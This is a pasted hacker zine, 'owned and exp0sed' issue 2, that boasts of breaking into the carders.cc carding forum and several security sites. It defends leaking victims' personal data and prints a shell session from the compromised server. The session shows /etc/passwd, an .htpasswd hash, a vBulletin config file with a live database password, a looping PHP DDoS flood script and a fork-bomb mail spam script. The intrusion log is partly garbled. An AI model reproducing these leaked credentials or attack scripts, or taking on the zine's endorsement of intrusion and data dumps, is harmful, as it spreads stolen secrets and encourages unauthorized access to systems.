NoPaste.me

Secure and Anonymous

Login

  • Only for Administration!
username Not specified
Time 25.12.2010 - 13:20
Scriptname Not specified
Code Language Plain-Text
This paste is public Public
Show Options
  1. For moar Info and the Databases check: http://tasteless.us/allgemein/admin/carders-cc-free-hack-gehackt-happy-ninjas-strike-back.html
  2.  
  3.                                                       |\___/|        
  4.               -=[ISSUE - NO 2]=-                     =) ^Y^ (=        
  5.                    -=[OF]=-                           \  ^  /        
  6.                                                        )=*=(          
  7.  ______________________________ __ ____________ _     /     \        
  8. |.-----.--.--.--.-----.-----.--|  |   ___ ___ _| ||   |     |        
  9. ||  _  |  |  |  |     |  -__|  _  |  | . |   | . ||  /| | | |\        
  10. ||_____|________|__|__|_____|_____|  |__,|_|_|___||  \| | |_|/\      
  11. |  | |                                   ______   |__//_// ___/ __    
  12. |  | |               .-----.--.--.-----.|      |.-----.--\_).--|  ||  
  13. |  | |               |  -__|_   _|  _  ||  ||  ||__ --|  -__|  _  ||  
  14. |  | |               |_____|__.__|   __||  ||  ||_____|_____|_____||  
  15. |_/   \__________________________|__|___|  ||  |___________________|  
  16.                                         |______|                      
  17. ------------------------.++-                                          
  18.                        / y-                                          
  19.                       /  y-                                          
  20. ---------------------/    s/----------------------.++-                
  21.                     /       ys+-.        |\      / y-                
  22. ---------------\.../    /\      ys------/()/    /  y-                
  23.                 sy      \/    /'''\      \|    /    s/-              
  24. ------------------+-++s     /-----'           /        s+-.          
  25. ---------------------/s    /-------------\.../    /\      ys          
  26.                       -y  s               sy      \/    /'''\        
  27. -----------------------y s---------------------++s     /-----'        
  28. ----------------------++'             |\        /s    /              
  29. -------------------------------------/()/        -y ys                
  30.                                       \|         -y s                
  31. -------------------------------------------------++'                  
  32.                                                 |_______________      
  33. ,_._._._._._._._,_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _|   carders.cc  `\    
  34. |_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|      inj3ct0r   \  
  35.                                   ~ Featuring ~ |       ettercap   \  
  36.       _______________|                          |___________________\
  37.     /´   exploit-db  |                          !                    
  38.    /   backtrack     |_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _,_._._._._._._._,
  39.   /  free-hack       |_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|
  40.  /___________________| ~ and ~                                        
  41.                      !                                                
  42.                                                                      
  43.                       Out of the Blue                                
  44.                             into the Black                            
  45. ,_._._._._._._._|____________________________________________________
  46. |_|_|_|_|_|_|_|_|___________________________________________________/
  47.     ~ INTRO ~   !                                                    
  48.                                                                      
  49. Greetings followers, welcome to the second issue of owned and exp0sed.
  50. This file is  encoded with UTF-8, so to view it  properly use unicode.
  51.                                                                      
  52. For those who are reading and laughing with us:                      
  53. We (your happy ninjas) wish you a                                    
  54.                                                                      
  55.                                  ,                                    
  56.                                _/^\_                                  
  57.                               < hax >                                
  58.                                /.-.\                                  
  59.             * MERRY *          `/&\`                                  
  60.                               ,@.*;@,                                
  61.                              /_o.I %_\                                
  62.                             (`'--:o(_@;                              
  63.                            /`;--.,__ `')                              
  64.                           ;@`o % O,*`'`&\                            
  65.                          (`'--)_@ ;o %'()\                            
  66.         * NINJA *        /`;--._`''--._O'@;                          
  67.                         /&*,()~o`;-.,_ `""`)                          
  68.                         /`,@ ;+& () o*`;-';\                          
  69.                         (`""--.,_0 +% @' &()\                        
  70.                        /-.,_    ``''--....-'`)                        
  71.                        /@%;o`:;'--,.__   __.'\                        
  72.                       ;*,&(); @ % &^;~`"`o;@();                      
  73.    * HAXMAS *         /(); o^~; & ().o@*&`;&%O\                      
  74.                       `"="==""==,,,.,="=="==="`                      
  75.                    __.----.(\-''#####---...___...-----._              
  76.                  '`         \)_`"""""`                                
  77.                          .--' `)                                      
  78.                        o(  )_-\                                      
  79.                          `"""` `                                      
  80.                                                                      
  81. After our first release we got wind of some strange rumours.  So  just
  82. to be sure, we need to clarify some facts.                            
  83.                                                                      
  84. So, who are we? First, lets talk about some things we are not. We  are
  85. not an underground rival kiddy group. We are not a cyber  mafia  gang.
  86. We are the watchmen, the hackers who quietly observe the scene. If any
  87. skiddy community gets too big, we shut them down. If any lamer  causes
  88. too much trouble, we shut them down. If any group keeps fucking  stuff
  89. up, we stop them.                                                    
  90.                                                                      
  91. So, why are we doing this? Some people say that being a  vigilanty  is
  92. wrong and that we are actually criminals. What can we say? This may be
  93. true. But the way we see it, if your not part of  the  solution,  your
  94. part of the fucking problem. These idiots spread  garbage  across  our
  95. scene and that is why they got owned. We take pride in what is left of
  96. the scene and we have serious problems with those who rape it.        
  97.                                                                      
  98. That's why we do what MUST be done.                                  
  99.                                                                      
  100. There are some things left we would  like  to  say  about  carders.cc.
  101. First of all, they came back online after they got rm'ed. In the first
  102. issue we gave our word that we would make sure carders.cc would  never
  103. come back. Well, we delivered on that promise in this  issue.  And  as
  104. such carders.cc has once again been eliminated. Maybe this  time  they
  105. will get the hint.                                                    
  106.                                                                      
  107. Also, Heise Security said  that  we  were  a  rival  group  trying  to
  108. capitalize on the demise of carders.cc. Apparently they weren't  happy
  109. about our disclosure of the  carders.cc  database  that  included  the
  110. personal information of carders.cc victims. What Heise forgot was that
  111. with this action, all the victims of  carders.cc  got  the  chance  to
  112. realize that they were victims of fraud. You can try to say  that  our
  113. disclosure of the database put them at even greater risk of fraud  but
  114. we disagree. What is more risky? Having your information  secretly  on
  115. an "underground" carding forum where it  WILL  be  sold  and  used  in
  116. frauduelent activity? Or, having  it  released  so  that  you  can  be
  117. notified and take the appropriate action to mitigate the  damage  that
  118. has been done? I know which option I'd rather have.                  
  119.                                                                      
  120. It is quite impressive how many people wrote about  the  Carders  Hack
  121. without even bothering to read the zine. It is hilarious  to  see  how
  122. the media works. Somebody writes an article, others  copy  information
  123. from it, others copy from it again. If we take a shit in a bowl.  Then
  124. you eat that shit and puke it back into a different bowl  for  someone
  125. else to eat then they do the  same  thing,  what  do  you  have?  "Two
  126. Journo's One Cup" is what you have. Fucking pathetic.                
  127.                                                                      
  128. On the other hand, we'd like to thank Brian Krebs. Even if some of his
  129. conclusions were way off the mark, he  was  still  the  first  one  to
  130. report about carders.cc and nearly every other article  was  based  on
  131. Brian's work. At least you didn't eat shit and regurgitate it like the
  132. rest Brian, keep up the good work.                                    
  133.                                                                      
  134. Enough jibber jabber, let's get to business.  You  will  soon  realize
  135. that our targets vary:                                                
  136.                                                                      
  137. We owned ettercap because we were tired of people firing that shit  up
  138. and pretending to be a l33th4x0r sheep who think they are the greatest
  139. hackerz with their ARP  spoofing  toolkitz..  If  you  have  installed
  140. ettercap in the last 5 years you may want to check yo shit (;p).      
  141.                                                                      
  142. We owned offsec including backtrack and exploit-db  because  they  are
  143. fucking security "expert" maggots (oops s/m/f/) who just fail so  hard
  144. at security that we wonder  why  people  really  take  their  training
  145. courses. We imagine it's like open mic night at the laughatorium.    
  146.                                                                      
  147. We owned inj3ct0r because they are lameass wannabe milw0rm kids  whose
  148. sole purpose in life is  to  disclose  XSS  0dayz  in  Joomla  (RSnake
  149. anyone?).                                                            
  150.                                                                      
  151. We owned carders.cc (AGAIN) because they  are  unable  to  learn  from
  152. their mistakes and keep spreading garbage around the underground.    
  153.                                                                      
  154. We owned free-hack  because  they  are  developing  into  one  of  the
  155. largest,  most  arrogant  script-kiddie  breeding   grounds   on   the
  156. intertubez.                                                          
  157.                                                                      
  158. ,_._._._._._._._|____________________________________________________
  159. |_|_|_|_|_|_|_|_|___________________________________________________/
  160.  ~ carders.cc ~ !                                                    
  161.                                                                      
  162. Here we go again. We hope that everybody was looking  forward  to  see
  163. carders.cc getting owned again. We kept our word, didn't  we?  Let  us
  164. begin:                                                                
  165.  ____________________________________________________________________
  166. |                         __          __                             |
  167. |     .-----.--.--.-----.|  |_.-----.|  |--.-----.--.--.             |
  168. |     |  _  |  |  |  _  ||   _|  -__||  _  |  _  |_   _|             |
  169. |     |__   |_____|_____||____|_____||_____|_____|__.__|             |
  170. |________|__|________________________________________________________|
  171. |                                                                    |
  172. | The  ninja  guys  piss  on  you  and  your half trained monkeys or |
  173. | whatever your leet underground team consists of.  If you continue, |
  174. | you will be  owned over again and rm'd twice.   Also we will punch |
  175. | you in the face.                                                   |
  176. |____________________________________________________________________|
  177.                                                                      
  178. Our lazy ninja squad was too drunk to come over and punch you  in  the
  179. fucking face. So we'll just stick to owning you  for  now.  Carders.cc
  180. went down for a few days, but came back as if  nothing  had  happened.
  181. They switched some server admins and installed some  new  software  in
  182. the hopes that they would be safe. They turned on some l33t "security"
  183. settings like PHP's "Safe Mode" and  "Openbase  Dir",  and  they  also
  184. disabled lots of functions. All in all they thought they  were  pretty
  185. locked down. Well, obviously they were fucking  wrong.  It's  hard  to
  186. harden a system when everything is backdoored and unfortunately we are
  187. just too ninja to get stopped by your silly protections. You can never
  188. stop us. We will always  keep owning and exp0sing you.                
  189.                                                                      
  190. No. Matter. What. You. Try.                                          
  191.  
  192. $ uname -a
  193. FreeBSD sec1560.2x4.ru 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21 15:02:08 UTC 2009     root@mason.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  amd64
  194.  
  195. $ id
  196. uid=1000(carderscc) gid=1000(carderscc) groups=1000(carderscc)
  197.  
  198. $ w
  199.  1:24AM  up 11 days,  4:23, 0 users, load averages: 0.37, 0.48, 0.54
  200. USER             TTY      FROM              LOGIN@  IDLE WHAT
  201.  
  202. $ alias ls="ls -la"
  203.  
  204. $ ls
  205.  
  206. total 47
  207. drwxr-xr-x  17 root  wheel   512 Jul  3 19:12 .
  208. drwxr-xr-x  17 root  wheel   512 Jul  3 19:12 ..
  209. -rw-r--r--   1 root  wheel   798 Jan 18  2010 .cshrc
  210. -rw-r--r--   1 root  wheel   265 Jan 18  2010 .profile
  211. -r--r--r--   1 root  wheel  6206 Jan 18  2010 COPYRIGHT
  212. -rw-r--r--   1 root  wheel     0 Jul  3 19:12 a
  213. drwxr-xr-x   2 root  wheel  1024 Jan 18  2010 bin
  214. drwxr-xr-x   7 root  wheel   512 Jan 18  2010 boot
  215. dr-xr-xr-x   5 root  wheel   512 Nov 24 21:14 dev
  216. drwxr-xr-x  22 root  wheel  2560 Nov  1 23:54 etc
  217. drwxr-x--x   4 root  wheel   512 Nov  1 23:54 home
  218. drwxr-xr-x   3 root  wheel  1536 Jan 18  2010 lib
  219. drwxr-xr-x   2 root  wheel   512 Apr  4  2010 libexec
  220. drwxr-xr-x   2 root  wheel   512 Jan 18  2010 media
  221. drwxr-xr-x   2 root  wheel   512 Jan 18  2010 mnt
  222. dr-xr-xr-x   1 root  wheel     0 Dec  6 00:58 proc
  223. drwxr-xr-x  11 root  wheel  1024 Nov  8 20:33 root
  224. drwxr-xr-x   2 root  wheel  2560 Jan 18  2010 sbin
  225. lrwxr-xr-x   1 root  wheel    11 Jan 18  2010 sys -> usr/src/sys
  226. drwxrwxrwt  11 root  wheel   512 Dec  5 23:42 tmp
  227. drwxr-xr-x 15 root  wheel   512 Jan 18  2010 usr
  228. drwxr-xr-x  23 root  wheel   512 Nov 24 21:14 var
  229.  
  230. $ cat /etc/passwd
  231. # $FreeBSD: src/etc/master.passwd,v 1.40.22.1.2.1 2009/10/25 01:10:29 kensmith Exp $
  232. #
  233. root:*:0:0:Charlie &:/root:/bin/csh
  234. toor:*:0:0:Bourne-again Superuser:/root:
  235. daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
  236. operator:*:2:5:System &:/:/usr/sbin/nologin
  237. bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
  238. tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
  239. kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
  240. games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
  241. news:*:8:8:News Subsystem:/:/usr/sbin/nologin
  242. man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
  243. sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
  244. smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
  245. mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
  246. bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
  247. proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
  248. _pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
  249. _dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
  250. uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
  251. pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
  252. www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
  253. nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
  254. mysql:*:88:88:MySQL Daemon:/nonexistent:/sbin/nologin
  255. postfix:*:125:125:Postfix Mail System:/var/spool/postfix:/usr/sbin/nologin
  256. carderscc:*:1000:1000:User &:/home/carderscc:/sbin/nologin
  257. cardersblog:*:1001:1001:User &:/home/cardersblog:/usr/sbin/nologin
  258.  
  259. $ cd /root
  260.  
  261. $ ls
  262. total 412628
  263. drwxr-xr-x  11 root       wheel           1024 Nov  8 20:33 .
  264. drwxr-xr-x  17 root       wheel            512 Jul  3 19:12 ..
  265. -rw-------   1 root       wheel           1856 Dec  5 23:53 .bash_history
  266. -rw-r--r--   1 root       wheel            798 Jan 18  2010 .cshrc
  267. -rw-------   1 root       wheel           2909 Dec  7 22:31 .history
  268. -rw-r--r--   1 root       wheel            155 Jan 18  2010 .k5login
  269. -rw-------   1 root       wheel             61 Jul  5 21:44 .lesshst
  270. -rw-r--r--   1 root       wheel            303 Jan 18  2010 .login
  271. drwx------   3 root       wheel            512 Dec  6 02:34 .mc
  272. -rw-------   1 root       wheel            641 Nov  8 20:33 .mysql_history
  273. -rw-r--r--   1 root       wheel            265 Jan 18  2010 .profile
  274. drwx------   2 root       wheel            512 Nov  7 17:20 .ssh
  275. -rw-r--r--   1 root       wheel      417314245 Oct 24 21:13 24_10_2010_carderscc_01.sql
  276. drwxr-xr-x   3 root       wheel            512 Jul  3 00:34 backup
  277. drwxr-xr-x   4 root       wheel            512 Nov  8 17:58 backups
  278. drwxr-xr-x   2 root       wheel            512 Jul 20  2009 crack
  279. -rw-r--r--   1 root       wheel           3223 Jul 20  2009 crack.zip
  280. -rw-r--r--   1 root       wheel             85 Aug  9 03:31 ddos.php
  281. -rw-r--r--   1 root       wheel            168 Feb  1  2010 example.php
  282. drwxr-xr-x   3 root       wheel            512 Jul  5 00:41 greensql
  283. -rw-r--r--   1 root       wheel             20 Aug  9 03:26 info.php
  284. -rw-------   1 root       wheel          16877 Jul 29 20:44 mbox
  285. drwxr-xr-x   3 root       wheel            512 Jul  3 18:59 php
  286. drwxr-xr-x  14 carderscc  carderscc       1536 Nov  2 16:15 proftpd-1.3.3c
  287. -rw-r--r--   1 root       wheel        4885847 Oct 29 17:27 proftpd-1.3.3c.tar.gz
  288. drwxr-xr-x   2 root       wheel            512 Nov  8 18:50 stylebackup
  289.  
  290. Mad PHP-Codez again!
  291.  
  292. $ cat ddos.php
  293. <?php
  294. while(1==1) {
  295. $fp = fsockopen("92.241.190.202", 80, $errno, $errstr, 30);
  296. }
  297. ?>
  298.  
  299. $ cat info.php
  300. <?php
  301. phpinfo();
  302. ?>
  303.  
  304. $ cat example.php
  305. <?php
  306. pcntl_fork();
  307. pcntl_fork();
  308. pcntl_fork();
  309. pcntl_fork();
  310.  
  311. for ($i=0; $i<10; $i++) {
  312. echo ".";
  313. mail("jeka@2x4.ru","spammtest","this is a very big message...");
  314. }
  315. ?>
  316.  
  317. $ cd /home/carderscc
  318.  
  319. $ ls
  320. total 18
  321. drwxr-x---   7 carderscc  www     512 Nov 18 20:45 .
  322. drwxr-x--x   4 root       wheel   512 Nov  1 23:54 ..
  323. dr-xr-x---  18 carderscc  www    2560 Nov 12 23:32 carders.cc
  324. drwxrwxr-x   2 carderscc  www     512 Dec  2 00:34 jabber.carders.cc
  325. drwxrwxr-x  11 carderscc  www    3072 Nov  8 17:27 pma
  326. drwxrwxrwx   2 carderscc  www    2048 Dec  6 00:40 temp
  327. drwxrwxr-x   5 carderscc  www     512 Nov  6 19:47 vbseo
  328.  
  329. $ cd carders.cc
  330.  
  331. $ ls
  332. total 2286
  333. dr-xr-x---  18 carderscc  www    2560 Nov 12 23:32 .
  334. drwxr-x---   7 carderscc  www     512 Nov 18 20:45 ..
  335. -r-xr-x---   1 carderscc  www    1107 Dec  5 15:34 .htaccess
  336. -r-xr-x---   1 carderscc  www      20 Nov 12 18:16 .htpasswd
  337. dr-xr-x---   4 carderscc  www    2048 Nov 18 21:17 admincp
  338. -r-xr-x---   1 carderscc  www   40115 Oct 29 20:53 ajax.php
  339. -r-xr-x---   1 carderscc  www   75525 Oct 29 20:53 album.php
  340. -r-xr-x---   1 carderscc  www   19041 Oct 29 20:52 announcement.php
  341. dr-xr-x---   2 carderscc  www     512 Oct 29 22:39 archive
  342. -r-xr-x---   1 carderscc  www    8668 Oct 29 20:52 asset.php
  343. -r-xr-x---   1 carderscc  www   20406 Oct 29 20:52 assetmanage.php
  344. -r-xr-x---   1 carderscc  www   15710 Oct 29 20:52 attachment.php
  345. -r-xr-x---   1 carderscc  www    6658 Oct 29 20:52 attachment_inlinemod.php
  346. -r-xr-x---   1 carderscc  www    3449 Oct 29 20:52 blog_attachment.php
  347. -r-xr-x---   1 carderscc  www   96043 Oct 29 20:53 calendar.php
  348. -r-xr-x---   1 carderscc  www      43 Oct 29 20:52 clear.gif
  349. dr-xr-x---   9 carderscc  www    3584 Nov  2 00:32 clientscript
  350. -r-xr-x---   1 carderscc  www   15270 Oct 29 20:52 converse.php
  351. dr-xr-x---   7 carderscc  www     512 Nov  2 00:33 cpstyles
  352. -r-xr-x---   1 carderscc  www    3231 Oct 29 20:52 cron.php
  353. -r-xr-x---   1 carderscc  www    5139 Oct 29 20:52 css.php
  354. dr-xr-x---   3 carderscc  www     512 Nov  2 00:33 customavatars
  355. dr-xr-x---   3 carderscc  www     512 Nov  2 00:33 customgroupicons
  356. dr-xr-x---   2 carderscc  www     512 Nov  2 00:33 customprofilepics
  357. -r-xr-x---   1 carderscc  www    1707 Oct 29 20:52 editor.php
  358. -r-xr-x---   1 carderscc  www   46932 Oct 29 20:53 editpost.php
  359. -r-xr-x---   1 carderscc  www    1326 Oct 29 20:52 entry.php
  360. -r-xr-x---   1 carderscc  www   30006 Oct 29 20:53 external.php
  361. -r-xr-x---   1 carderscc  www    9888 Oct 29 20:52 faq.php
  362. -r-xr-x---   1 carderscc  www    5430 Jul 29 15:42 favicon.ico
  363. -r-xr-x---   1 carderscc  www   22568 Oct 29 20:53 forum.php
  364. -r-xr-x---   1 carderscc  www   42374 Oct 29 20:53 forumdisplay.php
  365. -r-xr-x---   1 carderscc  www    1988 Oct 29 20:52 global.php
  366. -r-xr-x---   1 carderscc  www  155760 Oct 29 20:54 group.php
  367. -r-xr-x---   1 carderscc  www   26072 Oct 29 20:53 group_inlinemod.php
  368. -r-xr-x---   1 carderscc  www   11470 Oct 29 20:53 groupsubscription.php
  369. -r-xr-x---   1 carderscc  www    8961 Oct 29 20:53 image.php
  370. dr-xr-x---  28 carderscc  www    1536 Nov 22 16:54 images
  371. dr-xr-x---   9 carderscc  www    6144 Nov  6 19:47 includes
  372. -r-xr-x---   1 carderscc  www    2318 Oct 29 20:53 index.php
  373. -r-xr-x---   1 carderscc  www   46943 Oct 29 20:53 infraction.php
  374. -r-xr-x---   1 carderscc  www  187725 Oct 29 20:54 inlinemod.php
  375. -r-xr-x---   1 carderscc  www   23934 Jul 29 21:10 invites.php
  376. -r-xr-x---   1 carderscc  www    6778 Aug 14 08:15 itrader.php
  377. -r-xr-x---   1 carderscc  www   14964 Aug 14 08:15 itrader_detail.php
  378. -r-xr-x---   1 carderscc  www   13515 Aug 14 08:15 itrader_feedback.php
  379. -r-xr-x---   1 carderscc  www    1405 Aug 14 08:15 itrader_global.php
  380. -r-xr-x---   1 carderscc  www   22171 Aug 14 08:15 itrader_main.php
  381. -r-xr-x---   1 carderscc  www    3970 Aug 14 08:15 itrader_report.php
  382. -r-xr-x---   1 carderscc  www   11362 Oct 29 20:53 joinrequests.php
  383. -r-xr-x---   1 carderscc  www    1643 Oct 29 20:53 list.php
  384. -r-xr-x---   1 carderscc  www   10869 Oct 29 20:53 login.php
  385. dr-xr-x---   2 carderscc  www     512 Nov  2 00:33 madp
  386. -r-xr-x---   1 carderscc  www   30166 Oct 29 20:53 member.php
  387. -r-xr-x---   1 carderscc  www   16314 Oct 29 20:53 member_inlinemod.php
  388. -r-xr-x---   1 carderscc  www   40267 Oct 29 20:53 memberlist.php
  389. -r-xr-x---   1 carderscc  www   22186 Oct 29 20:53 misc.php
  390. dr-xr-x---   2 carderscc  www     512 Nov  6 19:48 modcp
  391. -r-xr-x---   1 carderscc  www   76749 Oct 29 20:53 moderation.php
  392. -r-xr-x---   1 carderscc  www    6701 Oct 29 20:53 moderator.php
  393. -r-xr-x---   1 carderscc  www   17474 Oct 29 20:53 newattachment.php
  394. -r-xr-x---   1 carderscc  www   41001 Oct 29 20:53 newreply.php
  395. -r-xr-x---   1 carderscc  www   20107 Oct 29 20:53 newthread.php
  396. -r-xr-x---   1 carderscc  www   21724 Oct 29 20:53 online.php
  397. dr-xr-x---   5 carderscc  www     512 Nov  2 00:33 packages
  398. -r-xr-x---   1 carderscc  www    8018 Oct 29 20:53 payment_gateway.php
  399. -r-xr-x---   1 carderscc  www   13282 Oct 29 20:53 payments.php
  400. -r-xr-x---   1 carderscc  www    3984 Oct 29 20:53 picture.php
  401. -r-xr-x---   1 carderscc  www   16587 Oct 29 20:53 picture_inlinemod.php
  402. -r-xr-x---   1 carderscc  www   26091 Oct 29 20:53 picturecomment.php
  403. -r-xr-x---   1 carderscc  www   29260 Oct 29 20:53 poll.php
  404. -r-xr-x---   1 carderscc  www   10336 Oct 29 20:53 posthistory.php
  405. -r-xr-x---   1 carderscc  www   76507 Oct 29 20:54 postings.php
  406. -r-xr-x---   1 carderscc  www    7009 Oct 29 20:53 printthread.php
  407. -r-xr-x---   1 carderscc  www   79357 Oct 29 20:54 private.php
  408. -r-xr-x---   1 carderscc  www  163617 Oct 29 20:55 profile.php
  409. -r-xr-x---   1 carderscc  www   56285 Oct 29 20:54 register.php
  410. -r-xr-x---   1 carderscc  www    7216 Oct 29 20:53 report.php
  411. -r-xr-x---   1 carderscc  www   14687 Oct 29 20:53 reputation.php
  412. -r-xr-x---   1 carderscc  www   34539 Oct 29 20:54 search.php
  413. -r-xr-x---   1 carderscc  www   22632 Oct 29 20:54 sendmessage.php
  414. -r-xr-x---   1 carderscc  www   12407 Oct 29 20:54 showgroups.php
  415. -r-xr-x---   1 carderscc  www   12660 Oct 29 20:54 showpost.php
  416. -r-xr-x---   1 carderscc  www   80037 Oct 29 20:54 showthread.php
  417. dr-xr-x---   2 carderscc  www     512 Nov  2 00:33 signaturepics
  418. dr-xr-x---   2 carderscc  www     512 Nov  2 00:32 store_sitemap
  419. -r-xr-x---   1 carderscc  www   38784 Oct 29 20:54 subscription.php
  420. -r-xr-x---   1 carderscc  www    5321 Oct 29 20:54 tags.php
  421. -r-xr-x---   1 carderscc  www    8722 Oct 29 20:54 threadrate.php
  422. -r-xr-x---   1 carderscc  www   11068 Oct 29 20:54 threadtag.php
  423. -r-xr-x---   1 carderscc  www      61 Oct 29 20:52 uploadprogress.gif
  424. -r-xr-x---   1 carderscc  www   39639 Oct 29 20:54 usercp.php
  425. -r-xr-x---   1 carderscc  www   20956 Oct 29 20:54 usernote.php
  426. -r-xr-x---   1 carderscc  www   16518 Jul 29 16:35 vaispy.php
  427. dr-xr-x---  13 carderscc  www    1024 Nov  2 00:32 vb
  428. dr-xr-x---   4 carderscc  www     512 Nov  6 19:48 vbseo
  429. -r-xr-x---   1 carderscc  www   45239 Nov  6 19:48 vbseo.php
  430. -r-xr-x---   1 carderscc  www    4112 Nov  6 19:47 vbseocp.php
  431. -r-xr-x---   1 carderscc  www   27801 Oct 29 20:54 visitormessage.php
  432. -r-xr-x---   1 carderscc  www    1647 Oct 29 20:54 widget.php
  433. -r-xr-x---   1 carderscc  www    3769 Oct 29 20:54 xmlsitemap.php
  434.  
  435. $ cat .htpasswd
  436. ddos:XScRLnTwdeJ6k
  437.  
  438. $ cat includes/config.php
  439. <?php
  440. /*======================================================================*\
  441. || #################################################################### ||
  442. || # vBulletin 4.0.3 Patch Level 1
  443. || # ---------------------------------------------------------------- # ||
  444. || # All PHP code in this file is ©2000-2010 vBulletin Solutions Inc. # ||
  445. || # This file may not be redistributed in whole or significant part. # ||
  446. || # ---------------- VBULLETIN IS NOT FREE SOFTWARE ---------------- # ||
  447. || # http://www.vbulletin.com | http://www.vbulletin.com/license.html # ||
  448. || #################################################################### ||
  449. \*======================================================================*/
  450.  
  451. /*-------------------------------------------------------*\
  452. | ****** NOTE REGARDING THE VARIABLES IN THIS FILE ****** |
  453. +---------------------------------------------------------+
  454. | If you get any errors while attempting to connect to    |
  455. | MySQL, you will need to email your webhost because we   |
  456. | cannot tell you the correct values for the variables    |
  457. | in this file.                                           |
  458. \*-------------------------------------------------------*/
  459.  
  460.         //      ****** DATABASE TYPE ******
  461.         //      This is the type of the database server on which your vBulletin database will be located.
  462.         //      Valid options are mysql and mysqli, for slave support add _slave.  Try to use mysqli if you are using PHP 5 and MySQL 4.1+
  463.         // for slave options just append _slave to your preferred database type.
  464. $config['Database']['dbtype'] = 'mysql';
  465.  
  466.         //      ****** DATABASE NAME ******
  467.         //      This is the name of the database where your vBulletin will be located.
  468.         //      This must be created by your webhost.
  469. $config['Database']['dbname'] = 'carderscc_01';
  470.  
  471.         //      ****** TABLE PREFIX ******
  472.         //      Prefix that your vBulletin tables have in the database.
  473. $config['Database']['tableprefix'] = '';
  474.  
  475.         //      ****** TECHNICAL EMAIL ADDRESS ******
  476.         //      If any database errors occur, they will be emailed to the address specified here.
  477.         //      Leave this blank to not send any emails when there is a database error.
  478. $config['Database']['technicalemail'] = 'dbmaster@example.com';
  479.  
  480.         //      ****** FORCE EMPTY SQL MODE ******
  481.         // New versions of MySQL (4.1+) have introduced some behaviors that are
  482.         // incompatible with vBulletin. Setting this value to "true" disables those
  483.         // behaviors. You only need to modify this value if vBulletin recommends it.
  484. $config['Database']['force_sql_mode'] = false;
  485.  
  486.  
  487.  
  488.         //      ****** MASTER DATABASE SERVER NAME AND PORT ******
  489.         //      This is the hostname or IP address and port of the database server.
  490.         //      If you are unsure of what to put herecat ddos.php
  491.  
  492.  
  493.  
  494.  
  495. , leave the default values.
  496. $config['MasterServer']['servername'] = 'localhost';
  497. $config['MasterServer']['port'] = 3306;
  498.  
  499.         //      ****** MASTER DATABASE USERNAME & PASSWORD ******
  500.         //      This is the username and password you use to access MySQL.
  501.         //      These must be obtained through your webhost.
  502. $config['MasterServer']['username'] = 'carderscc_01';
  503. $config['MasterServer']['password'] = 'VGZU76f3zgugdew&5gd3ugz&gd3uzguzg$dh3jgduzgdUGZDufe76g3d';
  504.  
  505.         //      ****** MASTER DATABASE PERSISTENT CONNECTIONS ******
  506.         //      This option allows you to turn persistent connections to MySQL on or off.
  507.         //      The difference in performance is negligible for all but the largest boards.
  508.         //      If you are unsure what this should be, leave it off. (0 = off; 1 = on)
  509. $config['MasterServer']['usepconnect'] = 0;
  510.  
  511.  
  512.  
  513.         //      ****** SLAVE DATABASE CONFIGURATION ******
  514.         //      If you have multiple database backends, this is the information for your slave
  515.         //      server. If you are not 100% sure you need to fill in this information,
  516.         //      do not change any of the values here.
  517. $config['SlaveServer']['servername'] = '';
  518. $config['SlaveServer']['port'] = 3306;
  519. $config['SlaveServer']['username'] = '';
  520. $config['SlaveServer']['password'] = '';
  521. $config['SlaveServer']['usepconnect'] = 0;
  522.  
  523.  
  524.  
  525.         //      ****** PATH TO ADMIN & MODERATOR CONTROL PANELS ******
  526.         //      This setting allows you to change the name of the folders that the admin and
  527.         //      moderator control panels reside in. You may wish to do this for security purposes.
  528.         //      Please note that if you change the name of the directory here, you will still need
  529.         //      to manually change the name of the directory on the server.
  530. $config['Misc']['admincpdir'] = 'admincp';
  531. $config['Misc']['modcpdir'] = 'modcp';
  532.  
  533.         //      Prefix that all vBulletin cookies will have
  534.         //      Keep this short and only use numbers and letters, i.e. 1-9 and a-Z
  535. $config['Misc']['cookieprefix'] = 'bb';
  536.  
  537.         //      ******** FULL PATH TO FORUMS DIRECTORY ******
  538.         //      On a few systems it may be necessary to input the full path to your forums directory
  539.         //      for vBulletin to function normally. You can ignore this setting unless vBulletin
  540.         //      tells you to fill this in. Do not include a trailing slash!
  541.         //      Example Unix:
  542.         //        $config['Misc']['forumpath'] = '/home/users/public_html/forums';
  543.         //      Example Win32:
  544.         //        $config['Misc']['forumpath'] = 'c:\program files\apache group\apache\htdocs\vb3';
  545. $config['Misc']['forumpath'] = '';
  546.  
  547.  
  548.  
  549.         //      ****** USERS WITH ADMIN LOG VIEWING PERMISSIONS ******
  550.         //      The users specified here will be allowed to view the admin log in the control panel.
  551.         //      Users must be specified by *ID number* here. To obtain a user's ID number,
  552.         //      view their profile via the control panel. If this is a new installation, leave
  553.         //      the first user created will have a user ID of 1. Seperate each userid with a comma.
  554. $config['SpecialUsers']['canviewadminlog'] = '4835,9816';
  555.  
  556.         //      ****** USERS WITH ADMIN LOG PRUNING PERMISSIONS ******
  557.         //      The users specified here will be allowed to remove ("prune") entries from the admin
